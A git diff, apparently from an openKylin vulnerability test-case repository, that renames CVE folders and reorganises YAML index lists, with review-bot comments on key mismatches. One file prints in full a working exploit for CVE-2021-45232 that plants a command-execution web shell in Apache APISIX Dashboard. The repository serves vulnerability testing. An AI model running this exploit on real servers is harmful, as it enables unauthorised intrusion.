diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md b/cve/apache-Apsix/2021/cve-2021-45232/RedMe.md
similarity index 100%
rename from cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md
rename to cve/apache-Apsix/2021/cve-2021-45232/RedMe.md
diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py
similarity index 96%
rename from cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
rename to cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py
index edd12c9f1d0ba6168ef5179a32a544486d7213dc..30ebcda546ab809f8b935e7353fefaf31542893e 100644
--- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
+++ b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py
@@ -1,93 +1,93 @@
-#!/usr/bin/env python3
-import zlib
-import json
-import random
-import requests
-import string
-import sys
-from urllib3.exceptions import InsecureRequestWarning
-
-# Suppress only the single warning from urllib3 needed.
-requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
-
-
-eval_config = {
- "Counsumers": [],
- "Routes": [
- {
- "id": str(random.randint(100000000000000000, 1000000000000000000)),
- "create_time": 1640674554,
- "update_time": 1640677637,
- "uris": [
- "/rce"
- ],
- "name": "rce",
- "methods": [
- "GET",
- "POST",
- "PUT",
- "DELETE",
- "PATCH",
- "HEAD",
- "OPTIONS",
- "CONNECT",
- "TRACE"
- ],
- "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
- "status": 1
- }
- ],
- "Services": [],
- "SSLs": [],
- "Upstreams": [],
- "Scripts": [],
- "GlobalPlugins": [],
- "PluginConfigs": []
-}
-
-
-def random_str():
- return ''.join(random.choices(string.ascii_letters + string.digits, k=6))
-
-
-def calc_crc(data):
- crc32 = zlib.crc32(data) & 0xffffffff
- return crc32.to_bytes(4, byteorder="big")
-
-
-def export_data(url):
- r = requests.get(url + "/apisix/admin/migrate/export", verify=False)
- return r.text[:-4]
-
-
-def import_data(url, data):
- data = json.dumps(data).encode()
- crc32 = calc_crc(data)
-
- files = {"file": ("data", data + crc32, "text/data")}
- resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False)
- # print(resp.text)
- if resp.json().get("code", -1) == 0:
- return True
- else:
- return False
-
-
-if __name__ == "__main__":
- if len(sys.argv) != 2:
- print("python " + sys.argv[0] + " http://127.0.0.1:9000")
- exit()
-
- url = sys.argv[1]
- if url.endswith("/"):
- url = url[:-1]
-
- uri = random_str()
- eval_config["Routes"][0]["uris"] = [ "/" + uri]
- eval_config["Routes"][0]["name"] = uri
-
- if import_data(url, eval_config):
- print("attack success")
- print("uri is: " + "/" + uri)
- else:
+#!/usr/bin/env python3
+import zlib
+import json
+import random
+import requests
+import string
+import sys
+from urllib3.exceptions import InsecureRequestWarning
+
+# Suppress only the single warning from urllib3 needed.
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+
+eval_config = {
+ "Counsumers": [],
+ "Routes": [
+ {
+ "id": str(random.randint(100000000000000000, 1000000000000000000)),
+ "create_time": 1640674554,
+ "update_time": 1640677637,
+ "uris": [
+ "/rce"
+ ],
+ "name": "rce",
+ "methods": [
+ "GET",
+ "POST",
+ "PUT",
+ "DELETE",
+ "PATCH",
+ "HEAD",
+ "OPTIONS",
+ "CONNECT",
+ "TRACE"
+ ],
+ "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
+ "status": 1
+ }
+ ],
+ "Services": [],
+ "SSLs": [],
+ "Upstreams": [],
+ "Scripts": [],
+ "GlobalPlugins": [],
+ "PluginConfigs": []
+}
+
+
+def random_str():
+ return ''.join(random.choices(string.ascii_letters + string.digits, k=6))
+
+
+def calc_crc(data):
+ crc32 = zlib.crc32(data) & 0xffffffff
+ return crc32.to_bytes(4, byteorder="big")
+
+
+def export_data(url):
+ r = requests.get(url + "/apisix/admin/migrate/export", verify=False)
+ return r.text[:-4]
+
+
+def import_data(url, data):
+ data = json.dumps(data).encode()
+ crc32 = calc_crc(data)
+
+ files = {"file": ("data", data + crc32, "text/data")}
+ resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False)
+ # print(resp.text)
+ if resp.json().get("code", -1) == 0:
+ return True
+ else:
+ return False
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ print("python " + sys.argv[0] + " http://127.0.0.1:9000")
+ exit()
+
+ url = sys.argv[1]
+ if url.endswith("/"):
+ url = url[:-1]
+
+ uri = random_str()
+ eval_config["Routes"][0]["uris"] = [ "/" + uri]
+ eval_config["Routes"][0]["name"] = uri
+
+ if import_data(url, eval_config):
+ print("attack success")
+ print("uri is: " + "/" + uri)
+ else:
 print("attack error")
\ No newline at end of file
diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml
similarity index 89%
rename from cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
rename to cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml
index ad102017e26ecb22741a65bbfed063bfe70dcce9..0a99c9b66858d5a8f25de8bf9f1024a4b8cf27e7 100644
--- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
+++ b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-45232
-source: https://github.com/wuppp/cve-2021-45232-exp
-info:
- name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
- severity: CRITICAL
- description:
- CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。
- scope-of-influence:
- In Apache APISIX Dashboard before 2.10.1
- reference:
- - http://www.openwall.com/lists/oss-security/2021/12/27/1
- - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
- - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
- - https://seclists.org/oss-sec/2021/q4/180
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2021-45232
- cwe-id: CWE-306
- cnvd-id: None
- kve-id: None
+id: CVE-2021-45232
+source: https://github.com/wuppp/cve-2021-45232-exp
+info:
+ name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
+ severity: CRITICAL
+ description:
+ CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。
+ scope-of-influence:
+ In Apache APISIX Dashboard before 2.10.1
+ reference:
+ - http://www.openwall.com/lists/oss-security/2021/12/27/1
+ - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232
+ - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5
+ - https://seclists.org/oss-sec/2021/q4/180
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-45232
+ cwe-id: CWE-306
+ cnvd-id: None
+ kve-id: None
 tags: cve2021
\ No newline at end of file
diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/apache-Apsix/2022/cve-2022-24112/README.md
similarity index 100%
rename from cve/Apache-APISIX/2022/cve-2022-24112/README.md
rename to cve/apache-Apsix/2022/cve-2022-24112/README.md
diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py
similarity index 100%
rename from cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py
rename to cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py
diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml
similarity index 100%
rename from cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml
rename to cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml
diff --git a/cve/apache/2020/CVE-2020-9490/README.md b/cve/apache-Httpd/2020/CVE-2020-9490/README.md
similarity index 100%
rename from cve/apache/2020/CVE-2020-9490/README.md
rename to cve/apache-Httpd/2020/CVE-2020-9490/README.md
diff --git a/cve/apache/2020/CVE-2020-9490/apache_poc.py b/cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py
similarity index 100%
rename from cve/apache/2020/CVE-2020-9490/apache_poc.py
rename to cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py
diff --git a/cve/apache/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml
similarity index 100%
rename from cve/apache/2020/yaml/CVE-2020-9490.yaml
rename to cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml
diff --git a/cve/apache/2021/CVE-2021-41773/README.md b/cve/apache-Httpd/2021/CVE-2021-41773/README.md
similarity index 100%
rename from cve/apache/2021/CVE-2021-41773/README.md
rename to cve/apache-Httpd/2021/CVE-2021-41773/README.md
diff --git a/cve/apache/2021/CVE-2021-41773/exploit.py b/cve/apache-Httpd/2021/CVE-2021-41773/exploit.py
similarity index 100%
rename from cve/apache/2021/CVE-2021-41773/exploit.py
rename to cve/apache-Httpd/2021/CVE-2021-41773/exploit.py
diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png
similarity index 100%
rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png
rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png
diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png
similarity index 100%
rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png
rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png
diff --git a/cve/apache/2021/CVE-2021-42013/PoC.sh b/cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh
similarity index 100%
rename from cve/apache/2021/CVE-2021-42013/PoC.sh
rename to cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh
diff --git a/cve/apache/2021/CVE-2021-42013/README.md b/cve/apache-Httpd/2021/CVE-2021-42013/README.md
similarity index 100%
rename from cve/apache/2021/CVE-2021-42013/README.md
rename to cve/apache-Httpd/2021/CVE-2021-42013/README.md
diff --git a/cve/apache/2021/CVE-2021-42013/apache.png b/cve/apache-Httpd/2021/CVE-2021-42013/apache.png
similarity index 100%
rename from cve/apache/2021/CVE-2021-42013/apache.png
rename to cve/apache-Httpd/2021/CVE-2021-42013/apache.png
diff --git a/cve/apache/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml
similarity index 100%
rename from cve/apache/2021/yaml/CVE-2021-41773.yaml
rename to cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml
diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml
similarity index 100%
rename from cve/apache/2021/yaml/CVE-2021-42013.yaml
rename to cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 34ad6d5929c852dce5d65fdebb786af503a5737f..a6752cdab4cc030af61fc0b367ebeafcccf8e664 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -1,13 +1,13 @@
 #仓库收录漏洞列表,列表中的测试用例在openKylin发行版上测试通过,用例有效。
 cve:
- apache:
+ apache-Httpd:
 - CVE-2020-9490
 - CVE-2021-41773
 - CVE-2021-42013
- apache-APISIX:
+ apache-Apisix:
 - CVE-2022-24112
 - CVE-2021-45232
- apache-activemq:
+ apache-Activemq:
 - CVE-2020-13932
 apache-CouchDB:
 - CVE-2022-24706
@@ -22,32 +22,31 @@ cve:
 - CVE-2021-26295
 apache-Airflow:
 - CVE-2020-11978
- apache-log4j:
+ apache-Log4j:
 - CVE-2021-44228
- apache-solr:
+ apache-Solr:
 - CVE-2021-27905
 - CVE-2019-0193
- apache-tomcat:
+ apache-Tomcat:
 - CVE-2022-29885
 - CVE-2020-9484
 - CVE-2020-1938
 - CVE-2017-12617
+ - CVE-2020-13935
 apache-Spark:
 - CVE-2022-33891
 apache-Flink:
 - CVE-2020-17518
- apache-tomcat:
- - CVE-2020-13935
- apache-unomi:
+ apache-Unomi:
 - CVE-2020-13942
- apache-struts:
+ apache-Struts:
 - CVE-2019-0230
 apache-Shiro:
 - CVE-2022-32532
- Influx-DB:
- - CVE-2019-20933
 apache-Commons:
 - CVE-2022-33980
+ influx-DB:
+ - CVE-2019-20933
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-29155
@@ -170,17 +169,19 @@ cve:
 - CVE-2022-22965
 - CVE-2022-22963
 - CVE-2022-31692
+ java-SE:
+ - CVE-2022-21449
 webmin:
 - CVE-2019-12840
 - CVE-2022-0824
 - CVE-2022-36446
 - CVE-2019-15107
- Zimbra:
+ zimbra:
 - CVE-2022-27925
 - CVE-2022-37042
- Grafana:
+ grafana:
 - CVE-2021-43798
- Froxlor:
+ froxlor:
 - CVE-2021-42325
 - CVE-2023-0315
 - CVE-2023-0877
@@ -197,5 +198,4 @@ kve:
 - KVE-2022-0206
 kylin-activation:
 - KVE-2022-0231
- Java-SE:
- - CVE-2022-21449
+
diff --git a/other_list.yaml b/other_list.yaml
index bf286e5e168d9fb0df17b53b0f28e89985c18fb9..ea9254993a1143b2ef3a3f4c841b1f2516f4128b 100644
--- a/other_list.yaml
+++ b/other_list.yaml
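Review bot: The new key `apache-Apisix:` in the first hunk of openkylin_list.yaml does not match the directory this same commit renames those entries into, `cve/apache-Apsix/` (the path is missing the "i"). If the list keys are meant to equal the directory names under `cve/`, as the `apache` to `apache-Httpd` rename suggests, then CVE-2022-24112 and CVE-2021-45232 will not resolve from their listed product on a case-sensitive filesystem. Rename the directory to `cve/apache-Apisix/` (or change the key to match) so the index and the tree agree. A header comment stating the rule would also help, for example `# keys must equal the directory name under cve/ (case-sensitive)`.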
@@ -19,11 +19,11 @@ cve:
 - CVE-2017-16995
 polkit:
 - CVE-2021-3560
- Outlook:
+ outlook:
 - CVE-2023-23397
 redis:
 - CVE-2022-0543
- EsFileExplorer:
+ esFileExplorer:
 - CVE-2019-6447
 docker:
 - CVE-2019-5736
@@ -47,27 +47,25 @@ cve:
 - CVE-2022-34265
 sudo:
 - CVE-2019-14287
- MinIO:
+ minIO:
 - CVE-2023-28432
 - CVE-2023-28434
- WebLogic:
+ webLogic:
 - CVE-2023-21839
- Node.js:
+ node.js:
 - CVE-2021-21315
 zabbix:
 - CVE-2022-23131
 weblogic:
 - CVE-2022-2555
 - CVE-2021-2109
- Zyxel:
+ zyxel:
 - CVE-2022-30525
- Gitlab:
+ gitlab:
 - CVE-2022-1175
-cnvd:
- WordPress:
+ wordPress:
 - CVE-2019-8942
 - CVE-2023-23488
- Zimbra:
+ zimbra:
 - CVE-2022-41352
 cnvd:
-
diff --git "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml"
index 1de85f71f54e22f3e557618d5ad800d42ff653e7..1de22702afdc6fa56088a555a066ad4906bf8a88 100644
--- "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml"
+++ "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml"
@@ -10,10 +10,10 @@ info:
 reference:
 - 漏洞相关链接
 classification:
- cvss-metrics: CVSS:3.1
+ cvss-metrics: CVSS向量
 cvss-score: 漏洞评分
- cve-id:
- cwe-id:
- cnvd-id:
- kve-id:
+ cve-id: CVE漏洞编号
+ cwe-id: CWE编号
+ cnvd-id: CNVD编号
+ kve-id: KVE编号
 tags: 漏洞标签
\ No newline at end of file
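Review bot: In the second hunk of other_list.yaml the renamed key `webLogic:` sits a few lines above the untouched `weblogic:` key, and because YAML keys are case-sensitive the two remain separate groups for what looks like the same product. Moving CVE-2023-21839 under `weblogic:` would match how this commit folds the duplicate `apache-tomcat` group in openkylin_list.yaml. The lower-casing is also applied only to the first letter (`minIO`, `esFileExplorer`, `wordPress`), so a one-line comment stating the intended key convention would make future entries consistent. The hunk also leaves the remaining `cnvd:` key with no entries, which loads as null; `cnvd: {}` would be safer if any consumer iterates it.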